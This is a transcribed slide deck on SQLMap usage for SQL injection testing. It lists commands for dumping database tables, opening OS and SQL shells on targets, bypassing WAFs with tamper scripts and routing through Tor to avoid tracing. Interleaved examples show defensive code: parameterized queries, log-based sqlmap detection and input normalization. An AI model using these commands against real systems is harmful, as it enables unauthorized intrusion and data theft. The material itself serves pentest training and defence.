Important SQLMap commands

zubairusman8 387 views 29 slides Jun 06, 2021

About This Presentation

The SQLMap tool can be found in every penetration tester’s toolbox. It is one of the most popular and powerful tools when it comes to exploiting SQL injection vulnerability, which itself tops the OWASP list of Top 10 Vulnerabilities. From confirming the SQL injection vulnerability to extracting th...


Slide Content

Important SQLMap commands
By M.Zubair Usman (Mr-Popeye)
<https://web.facebook.com/scoltech>
SQLMap commands
6/5/2021

GET request
●sqlmap -u http://site-to-test.com/test.php?id=1 -p id
●sqlmap -u http://site-to-test.com/test.php?id=1*
●-u: URL to scan
●-p: parameter to scan
●*: marks the parameter to scan directly in the URL (used when the -p switch is not provided)

POST request
●We can provide the data passed in the POST request body so that it is scanned by the
SQLMap tool.
●sqlmap -u http://site-to-test.com/admin/index.php --data="user=admin&password=admin" -p user
●--data: POST data
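As an added example (not part of the slides), the following Python shows the application-side defect that the `-p id` and `--data ... -p user` tests above are looking for, next to the hardened form a developer would ship. It uses an in-memory SQLite table built inline as constructed sample data; the table, rows and function names are assumptions for the demo, not anything from the presentation.

```python
"""Added example (not from the slides): why a `test.php?id=1` style lookup is
injectable and what the fix looks like. Everything here is constructed demo data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a constructed sample table standing in for the target application's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "alice@example.com"), (2, "bob", "bob@example.com")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, id_param: str) -> list:
    """The pattern the -p id test finds: the query-string value is pasted straight
    into the SQL text, so the value controls the WHERE clause."""
    sql = "SELECT id, name FROM users WHERE id = " + id_param
    return conn.execute(sql).fetchall()


def lookup_hardened(conn: sqlite3.Connection, id_param: str) -> list:
    """Fix: validate the type the parameter is supposed to have, then bind it as
    data. A non-numeric value is rejected before any SQL runs, and a bound value
    can never change the statement's structure."""
    try:
        user_id = int(id_param)
    except ValueError:
        raise ValueError("id must be an integer") from None
    return conn.execute("SELECT id, name FROM users WHERE id = ?", (user_id,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(lookup_vulnerable(conn, "1"))         # one row, as intended
    print(lookup_vulnerable(conn, "1 OR 1=1"))  # every row: the finding sqlmap reports
    print(lookup_hardened(conn, "1"))           # one row
    try:
        lookup_hardened(conn, "1 OR 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The hardened version does two independent things: the `int()` conversion rejects anything that is not the expected type, and the `?` placeholder hands the value to the driver as data rather than as SQL text. Either alone helps; together they remove the injection point that the slide's scan is designed to find.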

Scanning post-login pages
●Post-login pages are authorized by the Cookie header, which is sent in the HTTP
headers of a GET/POST request. To scan post-login page(s), we have to provide a
valid cookie to SQLMap.
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 --cookie="cookie value"
●/admin/index.php?id=1 is a post-login page

Scanning post-login pages
●Similarly, many pages are protected by the User-Agent or Referer header. These can
be included in the command:
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 --user-agent=infosec
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 --referer=http://192.168.202.163/admin/index.php

CRAWL
●Crawl is an important option which allows the SQLMap tool to crawl the website,
starting from the root location. The depth to crawl is defined in the command.
●sqlmap -u http://192.168.202.160/ --crawl=1
●--crawl: Defines the depth to crawl (for example, --crawl=2 lets the tool crawl up to
two directories deep).

CRAWL
●If we want to exclude a page from the crawler's scope, we can do so with
--crawl-exclude. This is a useful option when crawling post-login pages.
●sqlmap -u http://192.168.202.163/ --crawl=3 --cookie="cookie value" --crawl-exclude="logout"
●This command will crawl the website up to three directories deep and exclude any URL
in which the "logout" keyword is present.

SQLMap through proxy
●We can define a proxy through which the requests are passed. To pass the requests
through a proxy tool like Burp, start Burp Suite and configure it to listen on
localhost port 8080. Then use the following SQLMap command:
●sqlmap -u http://192.168.202.162/cat.php?id=1 -p id --proxy="http://localhost:8080"

SQLMap through proxy
●A tamper script (see the WAF section below) can, for example, check whether the
request has a keyword like "union" and, if so, replace it with "UnIoN."
●In a scenario where the application is accessible only through an authenticated
proxy server, the same can be defined using the following command:
●sqlmap -u http://192.168.202.162/cat.php?id=1 -p id --proxy="http://localhost:8080" --proxy-cred=username:password

Batch
●The --batch option is used for non-interactive sessions. While scanning, SQLMap may
ask us for input: for example, while using the crawl feature, the tool asks whether the
user wants to scan each identified URL. When --batch is defined in the command, the
tool uses the default answer and proceeds without asking the user.

Form
●A page URL with form fields (say a login page) can be provided along with the --form
option to parse the page and guide the user through testing the identified fields.

Form
●Pages with a large number of form fields can be tested efficiently by using the --form
and --batch options together. This parses the page, finds the form fields and
automatically supplies the default input on behalf of the user.
●If the entire application has to be scanned, the --crawl option can be combined with
the --form and --batch switches.

Threads
●The threads option allows the user to define the number of concurrent requests to be
sent by the SQLMap tool. This reduces the overall testing time. It should not be set
too high, as that may affect the accuracy of the results.
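From the defender's side, the custom User-Agent shown earlier and the thread count discussed here are the two things that shape what a sqlmap run looks like in web-server logs. As an added example (not from the slides), the following Python parses constructed Apache/nginx combined-format log lines and flags two things: sources whose User-Agent is sqlmap's default (which begins with `sqlmap/` unless `--user-agent` overrides it) and sources that send a burst of requests in a short window, which is what `--threads` produces and `--delay` merely slows. The IPs, paths and timestamps are made up for the demo, and the thresholds are assumptions to tune per site.

```python
"""Added example, not from the slides: spotting a sqlmap run in web-server access
logs. The log lines are constructed for this demo. The first check keys on the
tool's default User-Agent, which begins with "sqlmap/"; because --user-agent can
override it, the second check looks at request rate per source instead."""
import re
from collections import defaultdict
from datetime import datetime
from typing import Optional

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def _line(ip: str, second: int, path: str, ua: str) -> str:
    """Build one constructed combined-format log line (all values are made up)."""
    return (f'{ip} - - [05/Jun/2021:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'200 512 "-" "{ua}"')


# Constructed sample: a normal visitor, one request carrying the default sqlmap
# User-Agent, and a burst of 30 requests in 5 seconds from a source using a
# custom User-Agent ("infosec", as in the slide's --user-agent example).
SAMPLE_LOG = (
    [_line("203.0.113.7", s, "/cat.php?id=1", "Mozilla/5.0") for s in (0, 20, 41)]
    + [_line("198.51.100.9", 2, "/cat.php?id=1", "sqlmap/1.5 (https://sqlmap.org)")]
    + [_line("192.0.2.5", s // 6, f"/cat.php?id={s}", "infosec") for s in range(30)]
)


def parse_line(line: str) -> Optional[dict]:
    """Return the fields of one log line, or None if it is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FORMAT)
    return rec


def analyse(lines, burst_count: int = 10, window_seconds: int = 5) -> dict:
    """Return {"ua": IPs that sent a sqlmap User-Agent, "burst": IPs that sent
    burst_count requests inside some window_seconds-long sliding window}."""
    times_by_ip = defaultdict(list)
    ua_hits = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["ua"].lower().startswith("sqlmap/"):
            ua_hits.add(rec["ip"])
        times_by_ip[rec["ip"]].append(rec["ts"])

    bursts = set()
    for ip, times in times_by_ip.items():
        times.sort()
        # Sliding window over sorted timestamps: flag the source as soon as any
        # burst_count consecutive requests fit inside window_seconds.
        for i in range(len(times) - burst_count + 1):
            span = (times[i + burst_count - 1] - times[i]).total_seconds()
            if span <= window_seconds:
                bursts.add(ip)
                break
    return {"ua": ua_hits, "burst": bursts}


if __name__ == "__main__":
    result = analyse(SAMPLE_LOG)
    print("sqlmap User-Agent seen from:", sorted(result["ua"]))
    print("request bursts from:", sorted(result["burst"]))
```

The User-Agent check is cheap but only catches runs that kept the default; the rate check is what catches a run with `--user-agent=infosec`, at the cost of needing a threshold that does not also fire on legitimate crawlers or busy clients behind one NAT address.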

Risk and level
●Risk selects the type of payloads used by the tool. The default value is 1 and it can
be raised up to 3. Risk 3, the maximum, includes some heavy SQL queries.
●Level defines the number of checks/payloads to be performed. The value ranges
from 1 to 5. Level 5, the maximum, includes a large number of payloads in the scan.
●Increasing the risk and level is recommended when SQLMap cannot detect the
injection with the default settings.

Verbose
●In case we want to see the payloads being sent by the tool, we can use the verbose
option (-v). The values range from 1 to 6.

Database enumeration
●As SQLMap is mainly used for SQL injection exploitation, let's look at some of the
commands to enumerate the database through an application vulnerable to SQL
injection.
●1. --dbs: This option is used to enumerate the databases.

Database enumeration
●Now we have the database name. To extract the table for database “photoblog,” run
the following command:

Database enumeration
●To extract the column details from the table “users,” run the following command:

Database enumeration
●To dump the data for table "users," use the --dump option:

Database enumeration
●To identify the current database user:

Database enumeration
●To identify the current database name:

Database enumeration
●To identify the privileges and roles, and whether the current DB user is the DB admin:

Bypassing WAF using tamper script
●Many times, we come across a scenario where the application is kept behind a web
application firewall (WAF). To check if the site is protected by a WAF, we can use the
following option:
●--identify-waf
●Once the WAF is identified, we can use a tamper script to attack the WAF-protected
application. A tamper script modifies the request to escape WAF detection. The
scripts can be found under the /usr/share/sqlmap/tamper/ directory.
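The "union" to "UnIoN" rewrite mentioned earlier is the simplest illustration of what a tamper script does: it changes the bytes without changing the SQL. As an added example (not from the slides), the following Python contrasts a literal, case-sensitive keyword check with one that canonicalizes the value (URL-decode, lower-case, collapse whitespace) before matching, which is the minimum a WAF or input filter needs to do for the slide's rewrite not to matter. The signature list and test inputs are constructed for the demo.

```python
"""Added example (not from the slides): why a case-sensitive keyword check is
defeated by the "union" -> "UnIoN" rewrite, and what normalisation a filter
needs before matching. Signatures and inputs below are constructed demo values."""
import re
from urllib.parse import unquote_plus

# Constructed signature list; a real ruleset is far larger, this is just for the demo.
SIGNATURES = ("union select", "or 1=1", "sleep(", "information_schema")


def naive_filter(value: str) -> bool:
    """Literal, case-sensitive substring match: the check the tamper rewrite defeats."""
    return any(sig in value for sig in SIGNATURES)


def normalize(value: str) -> str:
    """Canonicalize before matching: URL-decode twice (so a double-encoded value
    is seen as the server will see it), lower-case, and collapse runs of
    whitespace so "UnIoN   SeLeCt" and "union select" compare equal."""
    decoded = unquote_plus(unquote_plus(value))
    return re.sub(r"\s+", " ", decoded).lower()


def normalized_filter(value: str) -> bool:
    """Same signatures, applied to the canonical form of the value."""
    return any(sig in normalize(value) for sig in SIGNATURES)


if __name__ == "__main__":
    for sample in ("42", "1 union select 1,2", "1 UnIoN SeLeCt 1,2", "1%20UnIoN%20SeLeCt%201"):
        print(f"{sample!r:30} naive={naive_filter(sample)!s:5} normalized={normalized_filter(sample)}")
```

Normalisation closes the specific gap the slide describes, but a signature filter of any kind is a detection aid in front of the application, not a fix inside it; the parameterized query is what removes the injection point, and the filter's job is to raise an alert and slow the scan down while that fix ships.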

Running system commands
●We can run OS/system level commands if the current database user has DBA
rights. We can use the following options:
●For a Linux server:
●sqlmap -u http://192.168.202.162/cat.php?id=1 --os-shell
●For a Windows server:
●sqlmap -u http://192.168.202.162/cat.php?id=1 --os-cmd <cmd>

Running SQL queries
●We can run SQL statements on the database with the following command:
●sqlmap -u 192.168.202.164/cat.php?id=2 --sql-shell

Other options
●Some other options include:
●1. Scanning a page protected by HTTP authentication like Basic, NTLM and Digest:
●sqlmap -u http://example.com/admin.aspx --auth-type Basic --auth-cred "admin:admin"
●2. Scanning a page protected by key-based authentication:
●sqlmap -u http://example.com/admin.aspx --auth-file=<path to PEM certificate or private key file>
●3. To randomize attacking IPs (this can help in cases like WAF detection, or when
hiding the attacking source would increase the difficulty of tracing the IP).
●To use the default Tor anonymity network:
●sqlmap -u http://example.com/admin.aspx --tor

Other options
●To define a Tor port:
●sqlmap -u http://example.com/admin.aspx --tor-port=<tor proxy port>
●4. If a delay is required between each HTTP request:
●sqlmap -u http://example.com/admin.aspx --delay=1   # 1 second delay
●5. If a page is protected by a CSRF token, we can tell SQLMap which parameter
carries the token so that it is refreshed on each request:
●sqlmap -u http://example.com/admin.aspx --csrf-token=<name of the csrf token parameter>
●6. Second-order SQL injection: In this type of SQL injection, the SQL payload is
stored in the database and retrieved later when a different page is accessed. We
provide a URL which SQLMap will request after every injection. We can instruct
SQLMap to test this injection with the following command:
●sqlmap -r /root/Desktop/Burp.txt --second-order "http://target/vulnerablepage.php"
●The Burp.txt file contains the request on which the injection is to be performed.
●--second-order "URL" gives the URL which SQLMap will access after every injection.